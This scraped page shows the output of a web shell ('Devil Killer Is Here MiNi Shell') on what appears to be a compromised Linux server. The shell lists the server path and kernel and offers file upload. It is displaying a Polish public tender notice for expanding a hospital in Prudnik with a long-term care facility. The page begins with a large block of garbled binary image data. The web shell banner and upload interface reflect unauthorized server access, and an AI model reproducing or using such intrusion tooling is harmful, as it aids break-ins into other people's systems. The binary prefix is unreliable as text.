JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /proc/thread-self/root/home/vmanager/www/common/web/tenders/20250520/

Linux 9dbcd5f6333d 5.15.0-153-generic #163-Ubuntu SMP Thu Aug 7 16:37:18 UTC 2025 x86_64
Upload File :
Current File : //proc/thread-self/root/home/vmanager/www/common/web/tenders/20250520/0023946001-N-2025.html

<!-- Version 1.0.0 --><style type="text/css"> .normal { color: black; } h1.title { }</style> <h1 class="text-center mt-5 mb-5">Ogłoszenie o zamówieniu<br/> Roboty budowlane<br/> Rozbudowa Prudnickiego Centrum Medycznego S. A. w Prudniku na potrzeby opieki długoterminowej w Zakładzie Opiekuńczo-Leczniczym. </h1> <h2 class="bg-light p-3 mt-4">SEKCJA I - ZAMAWIAJĄCY</h2> <h3 class="mb-0">1.1.) Rola zamawiającego</h3> <p class="mb-0">Postępowanie prowadzone jest samodzielnie przez zamawiającego</p> <h3 class="mb-0">1.2.) Nazwa zamawiającego: <span class="normal">Prudnickie Centrum Medyczne S. A. w Prudniku</span></h3> <h3 class="mb-0">1.4) Krajowy Numer Identyfikacyjny: <span class="normal">REGON 532448467</span></h3><h3 class="mb-0">1.5) Adres zamawiającego </h3> <h3 class="mb-0">1.5.1.) Ulica: <span class="normal">Szpitalna 14</span></h3> <h3 class="mb-0">1.5.2.) Miejscowość: <span class="normal">Prudnik</span></h3> <h3 class="mb-0">1.5.3.) Kod pocztowy: <span class="normal">48-200</span></h3> <h3 class="mb-0">1.5.4.) Województwo: <span class="normal">opolskie</span></h3> <h3 class="mb-0">1.5.5.) Kraj: <span class="normal">Polska</span></h3> <h3 class="mb-0">1.5.6.) Lokalizacja NUTS 3: <span class="normal">PL523 - Nyski</span></h3> <h3 class="mb-0">1.5.9.) Adres poczty elektronicznej: <span class="normal">pcm@pcm.prudnik.pl</span></h3> <h3 class="mb-0">1.5.10.) Adres strony internetowej zamawiającego: <span class="normal">www.pcm.prudnik.pl</span></h3> <h3 class="mb-0"> 1.6.) Rodzaj zamawiającego: <span class="normal">Zamawiający publiczny - inny zamawiający</span> </h3> <p class="mb-0"> Spółka prawa handlowego </p> <h3 class="mb-0"> 1.7.) Przedmiot działalności zamawiającego: <span class="normal">Zdrowie</span> </h3> <h2 class="bg-light p-3 mt-4">SEKCJA II – INFORMACJE PODSTAWOWE</h2> <h3 class="mb-0">2.1.) Ogłoszenie dotyczy: </h3> <p class="mb-0"> Zamówienia publicznego </p> <h3 class="mb-0">2.2.) Ogłoszenie dotyczy usług społecznych i innych szczególnych usług: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.3.) Nazwa zamówienia albo umowy ramowej: </h3> <p class="mb-0"> Rozbudowa Prudnickiego Centrum Medycznego S. A. w Prudniku na potrzeby opieki długoterminowej w Zakładzie Opiekuńczo-Leczniczym. </p> <h3 class="mb-0">2.4.) Identyfikator postępowania: <span class="normal">ocds-148610-1fb85bbd-9eed-44d2-9744-4b7e271ddf56</span></h3> <h3 class="mb-0">2.5.) Numer ogłoszenia: <span class="normal">2025/BZP 00239460</span></h3> <h3 class="mb-0">2.6.) Wersja ogłoszenia: <span class="normal">01</span></h3> <h3 class="mb-0">2.7.) Data ogłoszenia: <span class="normal">2025-05-20</span></h3> <h3 class="mb-0">2.8.) Zamówienie albo umowa ramowa zostały ujęte w planie postępowań: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.9.) Numer planu postępowań w BZP: <span class="normal">2025/BZP 00148823/01/P</span></h3> <h3 class="mb-0">2.10.) Identyfikator pozycji planu postępowań: </h3> <p class="mb-0">1.1.1 Roboty budowlane: rozbudowa szpitala w Prudniku oraz modernizacja Zakładu Opiekuńczo-Leczniczego w Głogówku na potrzeby opieki długoterminowej</p> <h3 class="mb-0">2.11.) O udzielenie zamówienia mogą ubiegać się wyłącznie wykonawcy, o których mowa w art. 94 ustawy: <span class="normal">Nie</span></h3> <h3 class="mb-0">2.14.) Czy zamówienie albo umowa ramowa dotyczy projektu lub programu współfinansowanego ze środków Unii Europejskiej: <span class="normal">Tak</span></h3> <h3 class="mb-0">2.15.) Nazwa projektu lub programu</h3> <p class="mb-0"> Krajowy Plan Odbudowy i Zwiększania Odporności - D4.1.1 „Rozwój opieki długoterminowej poprzez modernizację infrastruktury podmiotów leczniczych na poziomie powiatowym” </p> <h3 class="mb-0">2.16.) Tryb udzielenia zamówienia wraz z podstawą prawną</h3> <p class="mb-0"> Zamówienie udzielane jest w trybie podstawowym na podstawie: art. 275 pkt 1 ustawy </p> <h2 class="bg-light p-3 mt-4">SEKCJA III – UDOSTĘPNIANIE DOKUMENTÓW ZAMÓWIENIA I KOMUNIKACJA</h2> <h3 class="mb-0">3.1.) Adres strony internetowej prowadzonego postępowania</h3> https://pcm-prudnik.ezamawiajacy.pl/servlet/HomeServlet <h3 class="mb-0">3.2.) Zamawiający zastrzega dostęp do dokumentów zamówienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.4.) Wykonawcy zobowiązani są do składania ofert, wniosków o dopuszczenie do udziału w postępowaniu, oświadczeń oraz innych dokumentów wyłącznie przy użyciu środków komunikacji elektronicznej: <span class="normal">Tak</span></h3> <h3 class="mb-0">3.5.) Informacje o środkach komunikacji elektronicznej, przy użyciu których zamawiający będzie komunikował się z wykonawcami - adres strony internetowej: <span class="normal">https://pcm-prudnik.ezamawiajacy.pl/</span></h3> <h3 class="mb-0">3.6.) Wymagania techniczne i organizacyjne dotyczące korespondencji elektronicznej: <span class="normal">W postępowaniu o udzielenie zamówienia komunikacja między zamawiającym a wykonawcami, w tym oferty oraz wszelkie oświadczenia, wnioski (w tym o wyjaśnienie treści SWZ), zawiadomienia i informacje przekazywane są przy użyciu Platformy, która jest dostępna pod adresem<br/>https://pcm-prudnik.ezamawiajacy.pl/. Zasady komunikowania się za pośrednictwem platformy określa instrukcja dla wykonawcy, stanowiąca załącznik do SWZ (Załącznik nr 18) Korzystanie z Platformy https://pcm prudnik.ezamawiajacy.pl/jest bezpłatne. Ofertę i oświadczenia, o których mowa w art. 125 ust. 1 ustawy, składa się, pod rygorem nieważności w formie elektronicznej (tj. przy użyciu kwalifikowanego podpisu elektronicznego)lub w postaci elektronicznej opatrzonej podpisem zaufanym lub podpisem osobistym.<br/>Wykonawca zamierzający wziąć udział w postępowaniu o udzielenie zamówienia publicznego musi posiadać konto podmiotu „Wykonawca” na Platformie https://pcmprudnik.ezamawiajacy.pl/ <br/>Szczegółowe informacje na temat zakładania kont oraz zasady i<br/>warunki korzystania z https://pcm-prudnik.ezamawiajacy.pl/ określa „Instrukcja dla wykonawcy – instrukcja użytkownika” dostępna na<br/>stronie internetowej https://pcmprudnik.ezamawiajacy.pl/ oraz stanowiąca Załącznik nr 14 do SWZ (stan aktualny na dzień<br/>ogłoszenia naboru, co nie zwalnia Wykonawcy do korzystania z wersji aktualnej na dzień złożenia oferty). Numer telefonu udostępniony przez administratora platformy dla kontaktów z wykonawcami: +48 22 257 22 23. <br/>Sposób sporządzania i przekazywania dokumentów elektronicznych lub dokumentów elektronicznych będących kopią elektroniczną<br/>treści zapisanej w postaci papierowej (cyfrowe odwzorowania) musi być zgodny z wymaganiami określonymi w rozporządzeniu Prezesa Rady Ministrów z 30 grudnia 2020 r. W przypadku formatów, o których mowa w art. 66 ust. 1 ustawy, ww. regulacje nie będą miały bezpośredniego zastosowania.<br/>Informacje, oświadczenia lub dokumenty, inne niż wymienione w § 2 ust. 1 Rozporządzenia w sprawie wymagań dla dokumentów elektronicznych, przekazywane w postępowaniu sporządza się w postaci elektronicznej w<br/>formatach danych określonych w przepisach Rozporządzenia w sprawie Krajowych Ram Interoperacyjności (i przekazuje się jako załącznik), lub jako tekst wpisany bezpośrednio do wiadomości przekazywanej przy użyciu środków komunikacji elektronicznej. <br/>Jeżeli dokumenty elektroniczne, przekazywane przy użyciu środków komunikacji elektronicznej, zawierają informacje stanowiące tajemnicę przedsiębiorstwa w rozumieniu przepisów ustawy z dnia 16 kwietnia 1993 r. o zwalczaniu nieuczciwej konkurencji wykonawca, w celu utrzymania w poufności tych informacji, przekazuje je w wydzielonym i odpowiednio oznaczonym pliku, wraz z jednoczesnym zaznaczeniem w nazwie pliku „Dokument stanowiący tajemnicę przedsiębiorstwa”. <br/>W szczególnie uzasadnionych przypadkach uniemożliwiających komunikację Wykonawcy i Zamawiającego za pośrednictwem Platformy e-Zamówienia,<br/>Zamawiający dopuszcza komunikację za pomocą elektronicznej skrzynki podawczej ePUAP na adres Zamawiającego: /PCMPrudnik/<br/>SkrytkaESP (nie dotyczy składania ofert). Zamawiający sugeruje, aby korespondencja dotycząca niniejszego postępowania o udzielenie zamówienia publicznego oznaczona była nazwą, znakiem postępowania i numerem części, której dotyczy korespondencja. Wykonawca może zwrócić się do zamawiającego z wnioskiem o wyjaśnienie treści SWZ.</span></h3> <h3 class="mb-0">3.8.) Zamawiający wymaga sporządzenia i przedstawienia ofert przy użyciu narzędzi elektronicznego modelowania danych budowlanych lub innych podobnych narzędzi, które nie są ogólnie dostępne: <span class="normal">Nie</span></h3> <h3 class="mb-0">3.12.) Oferta - katalog elektroniczny: <span class="normal">Nie dotyczy</span></h3> <h3 class="mb-0">3.14.) Języki, w jakich mogą być sporządzane dokumenty składane w postępowaniu: </h3> <p class="mb-0">polski</p> <h2 class="bg-light p-3 mt-4">SEKCJA IV – PRZEDMIOT ZAMÓWIENIA</h2><h3 class="mb-0">4.1.) Informacje ogólne odnoszące się do przedmiotu zamówienia.</h3> <h3 class="mb-0">4.1.1.) Przed wszczęciem postępowania przeprowadzono konsultacje rynkowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.2.) Numer referencyjny: <span class="normal">1/V/2025</span></h3> <h3 class="mb-0">4.1.3.) Rodzaj zamówienia: <span class="normal">Roboty budowlane</span></h3> <h3 class="mb-0">4.1.4.) Zamawiający udziela zamówienia w częściach, z których każda stanowi przedmiot odrębnego postępowania: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.5.) Wartość zamówienia: <span class="normal"> 14237972,59 PLN </span> </h3> <h3 class="mb-0">4.1.8.) Możliwe jest składanie ofert częściowych: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.1.13.) Zamawiający uwzględnia aspekty społeczne, środowiskowe lub etykiety w opisie przedmiotu zamówienia: <span class="normal">Nie</span></h3><h3 class="mb-0">4.2. Informacje szczegółowe odnoszące się do przedmiotu zamówienia:</h3> <h3 class="mb-0">4.2.2.) Krótki opis przedmiotu zamówienia</h3> <p class="mb-0"> Rozbudowa Prudnickiego Centrum Medycznego S. A. w Prudniku na potrzeby opieki długoterminowej w Zakładzie Opiekuńczo-Leczniczym (tj. rozbudowa budynku szpitala z przeznaczeniem na Zakład Opiekuńczo-Leczniczy w Prudniku) będzie wykonywany w dwóch etapach, tj.: Etap I i Etap II przy czym:<br/>Etap I oznacza wykonanie dokumentacji projektowej wraz z uzyskaniem prawomocnej decyzji o pozwoleniu na budowę.<br/>Etap II oznacza roboty budowlane wraz z uzyskaniem prawomocnej decyzji o pozwoleniu na użytkowanie. Przedmiot zamówienia obejmuje opracowanie dokumentacji projektowej wraz z uzyskaniem prawomocnej decyzji o pozwoleniu na budowę oraz wykonanie robót budowlanych w ramach przedsięwzięcia inwestycyjnego polegającego na rozbudowie szpitala w Prudniku, przy ul. Piastowskiej 64, gmina Prudnik, powiat prudnicki, województwo opolskie w celu utworzenia zakładu opiekuńczo-leczniczego w Prudniku, a także uzyskanie prawomocnej decyzji o pozwoleniu na użytkowanie tego obiektu budowlanego oraz zagospodarowanie terenu przy obiekcie do pełnienia funkcji ogrodu terapeutycznego zgodnie z założeniami programu funkcjonalno-użytkowego stanowiącego Załącznik nr 10 do SWZ.<br/>b)	Przedmiot zamówienia polega na wykonaniu prac projektowych (opracowaniu dokumentacji projektowej zgodnie z ustawą Prawo budowlane z dnia 7 lipca 1994 r., tj. z 2025 r., poz. 418) związanych z rozbudową Prudnickiego Centrum Medycznego S. A. w Prudniku na potrzeby opieki długoterminowej w Zakładzie Opiekuńczo-Leczniczym zgodnie ze wskazaną w pkt. 1) niniejszego podrozdziału lokalizacją, uzyskanie prawomocnej decyzji o pozwoleniu na budowę dla tej lokalizacji, przeprowadzeniu robót budowlanych na podstawie opracowanej w ramach wykonania przedmiotu umowy dokumentacji projektowej (Etap I) i uzyskanych pozwoleń oraz zagospodarowania terenu z uwzględnieniem utworzenia ogrodu terapeutycznego oraz uzyskanie prawomocnej decyzji o pozwoleniu na użytkowanie – na potrzeby Inwestora, którym jest Prudnickie Centrum Medyczne Spółka Akcyjna w Prudniku.<br/>c)	Jakiekolwiek odniesienie PFU do rozwiązań projektowych i wykonawczych, w tym do nazw wyrobów czy producentów materiałów i urządzeń nie jest obowiązujące dla Wykonawcy, a jedynie przykładowe i ma na celu wskazanie standardów realizacji. Wykonawca może zastosować urządzenia i materiały równoważne do referencyjnych, jednak o parametrach nie gorszych niż te, które opisane zostały w PFU, przy czym Wykonawca zobowiązany jest zapewnić prawidłowe działanie poszczególnych systemów technicznych i technologicznych oraz osiągnięcie założeń funkcjonalnych całego obiektu oraz elementów zagospodarowania terenu. Wszystkie rozwiązania materiałowe muszą uzyskać akceptację Zamawiającego.<br/>d)	W zakresie zamówienia na prace projektowe przedmiot zamówienia obejmuje wykonanie zgodnie z wymogami określonymi w ustawie z dnia 7 lipca 1994 Prawo Budowlane (tj. Dz.U.2025, poz. 418), wielobranżowego projektu budowlanego dla założenia inwestycyjnego polegającego na utworzeniu zakładu opiekuńczo-leczniczego w Prudnickim Centrum Medycznym S. A. w Prudniku zgodnie ze wskazaną w pkt. 1) niniejszego podrozdziału lokalizacją, w ramach rozbudowy Prudnickiego Centrum Medycznego wraz z uzyskaniem wszelkich opinii, uzgodnień, pozwoleń (w tym pozwolenia Opolskiego Wojewódzkiego Konserwatora Zabytków) i innych dokumentów wymaganymi przepisami szczególnymi, w tym prawomocnej decyzji o pozwoleniu na budowę oraz prawomocnej decyzji o pozwoleniu na użytkowanie. Dokumentacja projektowa, a wraz z nią uzyskanie wszystkich niezbędnych uzgodnień i pozwoleń jest opracowywana zgodnie z dokumentacją wskazaną powyżej. Dokumentacja projektowa zawiera również koncepcję zagospodarowania ogrodu terapeutycznego w ramach projektu zagospodarowania terenu.<br/>e)	W zakresie zamówienia na prace projektowe zostanie opracowana graficzna i opisowa koncepcja kolorystyki wnętrza budowanego obiektu (ściany, podłogi, sufity), zgodnie z zapisami PFU. Zalecenia kolorystyczne będące opracowaniem własnym Zamawiającego mające charakter poglądowy stanowią załącznik nr 16 do SWZ. Kolorystyka wymaga zaakceptowania przez Zamawiającego w trakcie realizacji Etapu I.<br/>f)	W zakresie zamówienia na prace projektowe zostanie opracowana graficzna i opisowa koncepcja ogrodu terapeutycznego, zgodnie z zapisami PFU. Koncepcja wymaga zaakceptowania przez Zamawiającego w trakcie realizacji Etapu I.<br/>g)	W zakresie zamówienia na prace budowlane przedmiot zamówienia obejmuje:<br/>•	budowę Zakładu Opiekuńczo-Leczniczego w Prudnickim Centrum Medycznym S. A. w Prudniku, ul. Piastowska 64, 48-200 Prudnik, nr działki: 6739 zgodnie z uzyskanym pozwoleniem budowlanym dla opracowanej w ramach niniejszego przedmiotu zamówienia dokumentacji projektowej, zgodnej z zapisami programu PFU. <br/>•	wykonanie zagospodarowania terenu wokół budynku wraz z dojściami, dojazdami, drogą wewnętrzną, zjazdami z dróg publicznych, parkingiem dla samochodów osobowych, drogą pożarową oraz z utworzeniem ogrodu terapeutycznego zgodnie z zapisami PFU.<br/>•	Zamawiający dopuszcza technologię wykonania: technologię tradycyjną, technologię modułową na konstrukcji stalowej, technologię modułową na konstrukcji drewnianej. Zastosowany system modułowy powinien być zaprojektowany w taki sposób, aby umożliwiać jego łatwy i całościowy demontaż, dawać możliwość posortowania poszczególnych jego komponentów, oceny możliwości ich ponownego użycia oraz recykling lub prawidłową utylizację – gospodarka materiałami o obiegu zamkniętym. </p> <h3 class="mb-0">4.2.6.) Główny kod CPV: <span class="normal">71200000-0 - Usługi architektoniczne i podobne</span></h3> <h3 class="mb-0">4.2.7.) Dodatkowy kod CPV: </h3> <p class="mb-0">71300000-1 - Usługi inżynieryjne</p> <p class="mb-0">71220000-6 - Usługi projektowania architektonicznego</p> <p class="mb-0">71221000-3 - Usługi architektoniczne w zakresie obiektów budowlanych</p> <p class="mb-0">45000000-7 - Roboty budowlane</p> <p class="mb-0">45215000-7 - Roboty budowlane w zakresie budowy obiektów budowlanych opieki zdrowotnej i społecznej, krematoriów oraz obiektów użyteczności publicznej</p> <p class="mb-0">45112710-5 - Roboty w zakresie kształtowania terenów zielonych</p> <h3 class="mb-0">4.2.8.) Zamówienie obejmuje opcje: <span class="normal">Nie</span></h3> <!-- realizacja w dniach --> <h3 class="mb-0">4.2.10.) Okres realizacji zamówienia albo umowy ramowej: <span class="normal">11 miesiące</span></h3> <h3 class="mb-0">4.2.11.) Zamawiający przewiduje wznowienia: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.2.13.) Zamawiający przewiduje udzielenie dotychczasowemu wykonawcy zamówień na podobne usługi lub roboty budowlane: <span class="normal">Nie</span></h3> <h3 class="mb-0">4.3.) Kryteria oceny ofert</h3> <h3 class="mb-0">4.3.2.) Sposób określania wagi kryteriów oceny ofert: <span class="normal"> Punktowo </span></h3> <h3 class="mb-0">4.3.3.) Stosowane kryteria oceny ofert: <span class="normal"> Kryterium ceny oraz kryteria jakościowe </span></h3> <h3 class="mb-0">Kryterium 1</h3> <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Cena</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">60</span></h3> <h3 class="mb-0">Kryterium 2</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie Kierownika Budowy o specjalności konstrukcyjno-budowlanej bez ograniczeń w kierowaniu robotami budowlanymi przy minimum 2 inwestycjach dot. budowy, rozbudowy, nadbudowy lub przebudowy budynku użyteczności publicznej, w tym co najmniej jednego obiektu działającego w sektorze ochrony zdrowia (sanatorium, szpital, zakład opiekuńczo-leczniczy) w ostatnich 3 latach.</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">Kryterium 3</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> organizacja, kwalifikacje zawodowe i doświadczenie osób wyznaczonych do realizacji zamówienia <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Doświadczenie Projektanta specjalności architektoniczno – konstrukcyjnej bez ograniczeń w zakresie projektowania w w/w specjalności w sektorze ochrony zdrowia (szpital lub sanatorium lub zakład opiekuńczo-leczniczy) w ostatnich 5 latach.</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">20</span></h3> <h3 class="mb-0">Kryterium 4</h3> <h3 class="mb-0">4.3.4.) Rodzaj kryterium: </h3> inne. <h3 class="mb-0">4.3.5.) Nazwa kryterium: <span class="normal">Okres gwarancji: Wykonawca w druku oferty ma obowiązek podać okres gwarancji 60 miesięcy lub 72 miesiące lub 84 miesiące; przy czym gwarancja 60 miesięcy to warunek udziału w postępowaniu. Wpisanie przez Wykonawcę gwarancji krótszej niż 60 miesięcy skutkuje odrzuceniem oferty. Wpisanie innej liczby niż: 60 miesięcy lub 72 miesiące lub 84 miesiące skutkuje odrzuceniem oferty.</span></h3> <h3 class="mb-0">4.3.6.) Waga: <span class="normal">10</span></h3> <h3 class="mb-0">4.3.10.) Zamawiający określa aspekty społeczne, środowiskowe lub innowacyjne, żąda etykiet lub stosuje rachunek kosztów cyklu życia w odniesieniu do kryterium oceny ofert: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA V - KWALIFIKACJA WYKONAWCÓW</h2> <h3 class="mb-0">5.1.) Zamawiający przewiduje fakultatywne podstawy wykluczenia: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.2.) Fakultatywne podstawy wykluczenia: </h3> <p class="mb-0">Art. 109 ust. 1 pkt 1</p> <p class="mb-0">Art. 109 ust. 1 pkt 4</p> <p class="mb-0">Art. 109 ust. 1 pkt 7</p> <h3 class="mb-0">5.3.) Warunki udziału w postępowaniu: <span class="normal">Tak</span></h3> <h3 class="mb-0">5.4.) Nazwa i opis warunków udziału w postępowaniu.</h3> 1)	Zamawiający nie stawia wymogu złożenia wraz z ofertą przedmiotowych środków dowodowych.<br/>2)	Zamawiający informuje, że warunkiem koniecznym dla złożenia oferty jest odbycie wizji lokalnej w lokalizacji wskazanej w rozdziale 3, podrozdział 2, pkt 1, w terminach:<br/>a)	27 maja 2025 r., 28 maja 2025 r., 29 maja 2025 r. w godzinach od 09.00 do 15.00, po uprzednim umówieniu się (telefonicznie, elektronicznie, pisemnie) z Kierownikiem Działu Techniczno-Gospodarczego p. Pawłem Sobierajem, tel.: 77 40 67 850, mail: p.sobieraj@pcm.prudnik.pl, adres: PCM SA w Prudniku, ul. Szpitalna 14, 48-200 Prudnik.<br/>3)	Wykonawca podpisuje przedłożony przez Zamawiającego protokół o spełnieniu wymogu przeprowadzenia wizji lokalnej, podpisany przez upoważnionego przedstawiciela Wykonawcy, a ze strony Zamawiającego przez p. Pawła Sobieraja dla. Wzór protokołu stanowi Załącznik nr 17 do SWZ.<br/>4)	Protokół zostaje złożony u Zamawiającego. Protokół podpisuje i odbiera ze strony Zamawiającego p. Paweł Sobieraj w celu weryfikacji przeprowadzenia obowiązkowej wizji lokalnej w ramach prowadzonego postępowania. Nieodbycie wizji lokalnej, niepodpisanie przedłożonego protokołu lub protokołu podpisanego przez inną osobę niż wskazaną wyżej, skutkuje odrzuceniem oferty przez niespełnienie wymaganego warunku.<br/>5)	O udzielenie zamówienia mogą ubiegać się Wykonawcy, którzy: <br/>a) nie podlegają wykluczeniu, <br/>b) spełniają warunki udziału w postępowaniu. <br/>6)	Na podstawie art. 112 ustawy pzp, Zamawiający określa warunki udziału w postępowaniu dotyczące: <br/>a) zdolności do występowania w obrocie gospodarczym - Zamawiający nie formułuje warunków udziału w postępowaniu w tym zakresie; <br/>b) uprawnień do prowadzenia określonej działalności gospodarczej lub zawodowej, o ile wynika to z odrębnych przepisów - Zamawiający nie formułuje warunków udziału w postępowaniu w tym zakresie;<br/>c) sytuacji ekonomicznej lub finansowej - Zamawiający nie formułuje warunków udziału w postępowaniu w tym zakresie<br/>d) zdolności technicznej lub zawodowej:<br/>Zamawiający uzna, że Wykonawca spełnia warunek w zakresie zdolności technicznej lub zawodowej, jeżeli Wykonawca wykaże, że: <br/>•	w okresie ostatnich 5 lat przed upływem terminu składania ofert o udzielenie zamówienia, a w przypadku, gdy okres prowadzenia działalności jest krótszy, w tym okresie, wykonał należycie co najmniej dwie roboty budowlane, w tym co najmniej jedną o wartości nie mniejszej niż 7 000 000,00 zł brutto (siedem milionów 0/100 zł brutto) oraz co najmniej jedną o wartości nie mniejszej niż 4 000 000,00 zł brutto (cztery miliony 0/100 zł brutto), obejmujące budowę, rozbudowę, nadbudowę lub przebudowę budynku użyteczności publicznej, o co najmniej dwóch kondygnacjach.<br/>•	będzie dysponował osobami zdolnymi do wykonania zamówienia: tj.<br/>-	projektantem w branży architektoniczno – konstrukcyjnej - osobą posiadającą uprawnienia budowlane do projektowania w w/w specjalności, umożliwiające zrealizowanie przedmiotowego zamówienia, posiadająca doświadczenie w projektowaniu nie krótsze niż 5 lat posiadającą doświadczenie w projektowaniu w jednej ze wskazanych w PFU technologii.<br/>-	kierownikiem budowy, posiadającym uprawnienia budowlane do kierowania robotami w specjalności konstrukcyjno-budowlanej bez ograniczeń lub odpowiadające im ważne uprawnienia, które zostały wydane na podstawie wcześniej obowiązujących przepisów oraz zrzeszoną we właściwym samorządzie zawodowym zgodnie z przepisami ustawy z dnia 15.12.2000 r. o samorządach zawodowych architektów oraz inżynierów budownictwa (tj. Dz. U. z 2023 r. poz. 551) lub spełniającą warunki, o których mowa w art. 12a ustawy z dnia 7 lipca 1994 r. Prawo budowlane (tj. Dz. U. z 2025 r. poz. 418), tj. osobą, której odpowiednie 